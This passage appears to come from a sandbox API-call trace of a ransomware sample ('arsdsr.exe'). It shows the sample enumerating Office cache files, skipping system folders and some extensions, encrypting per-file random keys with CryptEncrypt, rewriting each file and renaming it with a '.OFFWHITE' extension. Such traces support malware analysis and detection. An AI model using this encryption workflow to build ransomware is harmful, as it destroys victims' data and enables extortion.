(pszPath="OfficeMUISet.msi") returned=".msi" [0086.261] lstrcmpiW (lpString1=".msi", lpString2=".exe") returned 1 [0086.261] lstrcmpiW (lpString1=".msi", lpString2=".log") returned 1 [0086.261] lstrcmpiW (lpString1=".msi", lpString2=".cab") returned 1 [0086.261] lstrcmpiW (lpString1=".msi", lpString2=".cmd") returned 1 [0086.261] lstrcmpiW (lpString1=".msi", lpString2=".com") returned 1 [0086.261] lstrcmpiW (lpString1=".msi", lpString2=".cpl") returned 1 [0086.261] lstrcmpiW (lpString1=".msi", lpString2=".ini") returned 1 [0086.261] lstrcmpiW (lpString1=".msi", lpString2=".dll") returned 1 [0086.261] lstrcmpiW (lpString1=".msi", lpString2=".url") returned -1 [0086.261] lstrcmpiW (lpString1=".msi", lpString2=".ttf") returned -1 [0086.262] lstrcmpiW (lpString1=".msi", lpString2=".mp3") returned 1 [0086.262] lstrcmpiW (lpString1=".msi", lpString2=".pif") returned -1 [0086.262] lstrcmpiW (lpString1=".msi", lpString2=".mp4") returned 1 [0086.262] lstrcmpiW (lpString1=".msi", lpString2=".OFFWHITE") returned -1 [0086.262] lstrcmpiW (lpString1=".msi", lpString2=".msi") returned 0 [0086.262] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x4529b900, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0x4529b900, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xe7b68970, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x333, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="OfficeMUISet.xml", cAlternateFileName="OFFICE~1.XML")) returned 1 [0086.262] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2=".") returned 1 [0086.262] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="..") returned 1 [0086.262] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="...") returned 1 [0086.262] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="windows") returned -1 [0086.262] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="$recycle.bin") returned 1 [0086.262] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="rsa") returned -1 [0086.262] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="ntuser.dat") returned 1 [0086.262] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="programdata") returned -1 [0086.262] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="appdata") returned 1 [0086.262] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="program files") returned -1 [0086.262] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="program files (x86)") returned -1 [0086.262] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0086.262] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="OfficeMUISet.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" [0086.262] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.262] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.262] PathFindExtensionW (pszPath="OfficeMUISet.xml") returned=".xml" [0086.262] lstrcmpiW (lpString1=".xml", lpString2=".exe") returned 1 [0086.262] lstrcmpiW (lpString1=".xml", lpString2=".log") returned 1 [0086.262] lstrcmpiW (lpString1=".xml", lpString2=".cab") returned 1 [0086.262] lstrcmpiW (lpString1=".xml", lpString2=".cmd") returned 1 [0086.262] lstrcmpiW (lpString1=".xml", lpString2=".com") returned 1 [0086.262] lstrcmpiW (lpString1=".xml", lpString2=".cpl") returned 1 [0086.262] lstrcmpiW (lpString1=".xml", lpString2=".ini") returned 1 [0086.262] lstrcmpiW (lpString1=".xml", lpString2=".dll") returned 1 [0086.262] lstrcmpiW (lpString1=".xml", lpString2=".url") returned 1 [0086.262] lstrcmpiW (lpString1=".xml", lpString2=".ttf") returned 1 [0086.262] lstrcmpiW (lpString1=".xml", lpString2=".mp3") returned 1 [0086.262] lstrcmpiW (lpString1=".xml", lpString2=".pif") returned 1 [0086.263] lstrcmpiW (lpString1=".xml", lpString2=".mp4") returned 1 [0086.263] lstrcmpiW (lpString1=".xml", lpString2=".OFFWHITE") returned 1 [0086.263] lstrcmpiW (lpString1=".xml", lpString2=".msi") returned 1 [0086.263] lstrcmpiW (lpString1="OfficeMUISet.xml", lpString2="OFFWHITE-MANUAL.txt") returned -1 [0086.263] GetProcessHeap () returned 0x500000 [0086.263] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547c78 [0086.263] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0086.263] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=819) returned 1 [0086.263] GetProcessHeap () returned 0x500000 [0086.263] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0086.263] GetProcessHeap () returned 0x500000 [0086.263] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0086.263] GetProcessHeap () returned 0x500000 [0086.263] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0086.263] GetProcessHeap () returned 0x500000 [0086.263] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0086.263] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.263] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.263] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0086.263] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.263] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.263] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0086.263] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.263] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.263] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e310*=0x100) returned 1 [0086.264] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.264] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.264] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e30c*=0x100) returned 1 [0086.264] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x333, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.264] SetLastError (dwErrCode=0x0) [0086.264] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.335] GetLastError () returned 0x0 [0086.335] GetLastError () returned 0x0 [0086.335] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x433, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.335] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.335] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x533, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.335] WriteFile (in: hFile=0x21c, lpBuffer=0x547c78*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547c78*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0086.335] GetProcessHeap () returned 0x500000 [0086.336] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x333) returned 0x53f480 [0086.336] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.336] ReadFile (in: hFile=0x21c, lpBuffer=0x53f480, nNumberOfBytesToRead=0x333, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x53f480*, lpNumberOfBytesRead=0x295e540*=0x333, lpOverlapped=0x0) returned 1 [0086.336] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.336] WriteFile (in: hFile=0x21c, lpBuffer=0x53f480*, nNumberOfBytesToWrite=0x333, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x53f480*, lpNumberOfBytesWritten=0x295e54c*=0x333, lpOverlapped=0x0) returned 1 [0086.336] GetProcessHeap () returned 0x500000 [0086.336] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x53f480 | out: hHeap=0x500000) returned 1 [0086.336] CloseHandle (hObject=0x21c) returned 1 [0086.337] GetProcessHeap () returned 0x500000 [0086.337] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0086.337] GetProcessHeap () returned 0x500000 [0086.337] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0086.337] GetProcessHeap () returned 0x500000 [0086.337] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0086.337] GetProcessHeap () returned 0x500000 [0086.337] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0086.337] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" [0086.337] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.OFFWHITE" [0086.338] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\OfficeMUISet.xml.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\officemuiset.xml.offwhite")) returned 1 [0086.338] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xc8b16200, ftCreationTime.dwHighDateTime=0x1cac190, ftLastAccessTime.dwLowDateTime=0xc8b16200, ftLastAccessTime.dwHighDateTime=0x1cac190, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x2ed80, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="osetupui.dll", cAlternateFileName="")) returned 1 [0086.338] lstrcmpiW (lpString1="osetupui.dll", lpString2=".") returned 1 [0086.338] lstrcmpiW (lpString1="osetupui.dll", lpString2="..") returned 1 [0086.338] lstrcmpiW (lpString1="osetupui.dll", lpString2="...") returned 1 [0086.338] lstrcmpiW (lpString1="osetupui.dll", lpString2="windows") returned -1 [0086.338] lstrcmpiW (lpString1="osetupui.dll", lpString2="$recycle.bin") returned 1 [0086.338] lstrcmpiW (lpString1="osetupui.dll", lpString2="rsa") returned -1 [0086.339] lstrcmpiW (lpString1="osetupui.dll", lpString2="ntuser.dat") returned 1 [0086.339] lstrcmpiW (lpString1="osetupui.dll", lpString2="programdata") returned -1 [0086.339] lstrcmpiW (lpString1="osetupui.dll", lpString2="appdata") returned 1 [0086.339] lstrcmpiW (lpString1="osetupui.dll", lpString2="program files") returned -1 [0086.339] lstrcmpiW (lpString1="osetupui.dll", lpString2="program files (x86)") returned -1 [0086.339] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0086.339] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="osetupui.dll" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\osetupui.dll" [0086.339] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.339] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.339] PathFindExtensionW (pszPath="osetupui.dll") returned=".dll" [0086.339] lstrcmpiW (lpString1=".dll", lpString2=".exe") returned -1 [0086.339] lstrcmpiW (lpString1=".dll", lpString2=".log") returned -1 [0086.339] lstrcmpiW (lpString1=".dll", lpString2=".cab") returned 1 [0086.339] lstrcmpiW (lpString1=".dll", lpString2=".cmd") returned 1 [0086.339] lstrcmpiW (lpString1=".dll", lpString2=".com") returned 1 [0086.339] lstrcmpiW (lpString1=".dll", lpString2=".cpl") returned 1 [0086.339] lstrcmpiW (lpString1=".dll", lpString2=".ini") returned -1 [0086.339] lstrcmpiW (lpString1=".dll", lpString2=".dll") returned 0 [0086.339] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x77cbb000, ftCreationTime.dwHighDateTime=0x1cac57a, ftLastAccessTime.dwLowDateTime=0x77cbb000, ftLastAccessTime.dwHighDateTime=0x1cac57a, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x6a3b, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="pss10r.chm", cAlternateFileName="")) returned 1 [0086.339] lstrcmpiW (lpString1="pss10r.chm", lpString2=".") returned 1 [0086.339] lstrcmpiW (lpString1="pss10r.chm", lpString2="..") returned 1 [0086.339] lstrcmpiW (lpString1="pss10r.chm", lpString2="...") returned 1 [0086.339] lstrcmpiW (lpString1="pss10r.chm", lpString2="windows") returned -1 [0086.339] lstrcmpiW (lpString1="pss10r.chm", lpString2="$recycle.bin") returned 1 [0086.339] lstrcmpiW (lpString1="pss10r.chm", lpString2="rsa") returned -1 [0086.339] lstrcmpiW (lpString1="pss10r.chm", lpString2="ntuser.dat") returned 1 [0086.339] lstrcmpiW (lpString1="pss10r.chm", lpString2="programdata") returned 1 [0086.339] lstrcmpiW (lpString1="pss10r.chm", lpString2="appdata") returned 1 [0086.339] lstrcmpiW (lpString1="pss10r.chm", lpString2="program files") returned 1 [0086.339] lstrcmpiW (lpString1="pss10r.chm", lpString2="program files (x86)") returned 1 [0086.340] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0086.340] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="pss10r.chm" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" [0086.340] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.340] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.340] PathFindExtensionW (pszPath="pss10r.chm") returned=".chm" [0086.340] lstrcmpiW (lpString1=".chm", lpString2=".exe") returned -1 [0086.340] lstrcmpiW (lpString1=".chm", lpString2=".log") returned -1 [0086.340] lstrcmpiW (lpString1=".chm", lpString2=".cab") returned 1 [0086.340] lstrcmpiW (lpString1=".chm", lpString2=".cmd") returned -1 [0086.340] lstrcmpiW (lpString1=".chm", lpString2=".com") returned -1 [0086.340] lstrcmpiW (lpString1=".chm", lpString2=".cpl") returned -1 [0086.340] lstrcmpiW (lpString1=".chm", lpString2=".ini") returned -1 [0086.340] lstrcmpiW (lpString1=".chm", lpString2=".dll") returned -1 [0086.340] lstrcmpiW (lpString1=".chm", lpString2=".url") returned -1 [0086.340] lstrcmpiW (lpString1=".chm", lpString2=".ttf") returned -1 [0086.340] lstrcmpiW (lpString1=".chm", lpString2=".mp3") returned -1 [0086.340] lstrcmpiW (lpString1=".chm", lpString2=".pif") returned -1 [0086.340] lstrcmpiW (lpString1=".chm", lpString2=".mp4") returned -1 [0086.340] lstrcmpiW (lpString1=".chm", lpString2=".OFFWHITE") returned -1 [0086.340] lstrcmpiW (lpString1=".chm", lpString2=".msi") returned -1 [0086.340] lstrcmpiW (lpString1="pss10r.chm", lpString2="OFFWHITE-MANUAL.txt") returned 1 [0086.340] GetProcessHeap () returned 0x500000 [0086.340] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x8) returned 0x547c88 [0086.340] CreateFileW (lpFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x21c [0086.341] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x295e560 | out: lpFileSize=0x295e560*=27195) returned 1 [0086.341] GetProcessHeap () returned 0x500000 [0086.341] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548790 [0086.341] GetProcessHeap () returned 0x500000 [0086.341] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x10) returned 0x548778 [0086.341] GetProcessHeap () returned 0x500000 [0086.341] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5241a8 [0086.341] GetProcessHeap () returned 0x500000 [0086.341] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x100) returned 0x5240a0 [0086.341] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.341] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.341] SystemFunction036 (in: RandomBuffer=0x548790, RandomBufferLength=0x10 | out: RandomBuffer=0x548790) returned 1 [0086.341] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.341] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.341] SystemFunction036 (in: RandomBuffer=0x548778, RandomBufferLength=0x10 | out: RandomBuffer=0x548778) returned 1 [0086.341] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.341] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.341] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5241a8*, pdwDataLen=0x295e310*=0x10, dwBufLen=0x100 | out: pbData=0x5241a8*, pdwDataLen=0x295e310*=0x100) returned 1 [0086.341] lstrcmpiW (lpString1="arsdsr.exe", lpString2="KERNEL32.DLL") returned -1 [0086.341] lstrcmpiW (lpString1="kernel32.dll", lpString2="KERNEL32.DLL") returned 0 [0086.341] CryptEncrypt (in: hKey=0x51e880, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x10, dwBufLen=0x100 | out: pbData=0x5240a0*, pdwDataLen=0x295e30c*=0x100) returned 1 [0086.342] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x6a3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.342] SetLastError (dwErrCode=0x0) [0086.342] WriteFile (in: hFile=0x21c, lpBuffer=0x5241a8*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5241a8*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.382] GetLastError () returned 0x0 [0086.382] GetLastError () returned 0x0 [0086.382] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x6b3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.382] WriteFile (in: hFile=0x21c, lpBuffer=0x5240a0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5240a0*, lpNumberOfBytesWritten=0x295e54c*=0x100, lpOverlapped=0x0) returned 1 [0086.382] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x6c3b, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.382] WriteFile (in: hFile=0x21c, lpBuffer=0x547c88*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x547c88*, lpNumberOfBytesWritten=0x295e54c*=0x8, lpOverlapped=0x0) returned 1 [0086.382] GetProcessHeap () returned 0x500000 [0086.382] RtlAllocateHeap (HeapHandle=0x500000, Flags=0x0, Size=0x6a3b) returned 0x5537b0 [0086.382] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.382] ReadFile (in: hFile=0x21c, lpBuffer=0x5537b0, nNumberOfBytesToRead=0x6a3b, lpNumberOfBytesRead=0x295e540, lpOverlapped=0x0 | out: lpBuffer=0x5537b0*, lpNumberOfBytesRead=0x295e540*=0x6a3b, lpOverlapped=0x0) returned 1 [0086.394] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0086.394] WriteFile (in: hFile=0x21c, lpBuffer=0x5537b0*, nNumberOfBytesToWrite=0x6a3b, lpNumberOfBytesWritten=0x295e54c, lpOverlapped=0x0 | out: lpBuffer=0x5537b0*, lpNumberOfBytesWritten=0x295e54c*=0x6a3b, lpOverlapped=0x0) returned 1 [0086.395] GetProcessHeap () returned 0x500000 [0086.395] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5537b0 | out: hHeap=0x500000) returned 1 [0086.395] CloseHandle (hObject=0x21c) returned 1 [0086.396] GetProcessHeap () returned 0x500000 [0086.396] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5241a8 | out: hHeap=0x500000) returned 1 [0086.396] GetProcessHeap () returned 0x500000 [0086.396] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x5240a0 | out: hHeap=0x500000) returned 1 [0086.396] GetProcessHeap () returned 0x500000 [0086.396] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548790 | out: hHeap=0x500000) returned 1 [0086.396] GetProcessHeap () returned 0x500000 [0086.396] HeapFree (in: hHeap=0x500000, dwFlags=0x0, lpMem=0x548778 | out: hHeap=0x500000) returned 1 [0086.396] lstrcpyW (in: lpString1=0x295e338, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" [0086.396] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm", lpString2=".OFFWHITE" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.OFFWHITE") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.OFFWHITE" [0086.396] MoveFileW (lpExistingFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm"), lpNewFileName="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\pss10r.chm.OFFWHITE" (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\pss10r.chm.offwhite")) returned 1 [0086.397] FindNextFileW (in: hFindFile=0x544610, lpFindFileData=0x295e598 | out: lpFindFileData=0x295e598*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x7cab9f00, ftCreationTime.dwHighDateTime=0x1cac8ad, ftLastAccessTime.dwLowDateTime=0x7cab9f00, ftLastAccessTime.dwHighDateTime=0x1cac8ad, ftLastWriteTime.dwLowDateTime=0xe8728670, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x10676, dwReserved0=0x340032, dwReserved1=0x295f070, cFileName="setup.chm", cAlternateFileName="")) returned 1 [0086.397] lstrcmpiW (lpString1="setup.chm", lpString2=".") returned 1 [0086.397] lstrcmpiW (lpString1="setup.chm", lpString2="..") returned 1 [0086.397] lstrcmpiW (lpString1="setup.chm", lpString2="...") returned 1 [0086.397] lstrcmpiW (lpString1="setup.chm", lpString2="windows") returned -1 [0086.397] lstrcmpiW (lpString1="setup.chm", lpString2="$recycle.bin") returned 1 [0086.397] lstrcmpiW (lpString1="setup.chm", lpString2="rsa") returned 1 [0086.397] lstrcmpiW (lpString1="setup.chm", lpString2="ntuser.dat") returned 1 [0086.397] lstrcmpiW (lpString1="setup.chm", lpString2="programdata") returned 1 [0086.397] lstrcmpiW (lpString1="setup.chm", lpString2="appdata") returned 1 [0086.397] lstrcmpiW (lpString1="setup.chm", lpString2="program files") returned 1 [0086.397] lstrcmpiW (lpString1="setup.chm", lpString2="program files (x86)") returned 1 [0086.398] lstrcpyW (in: lpString1=0x295e7e8, lpString2="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\") returned="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\" [0086.398] lstrcatW (in: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\", lpString2="setup.chm" | out: lpString1="C:/MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\setup.chm") returned="C:/MSOCache\\All 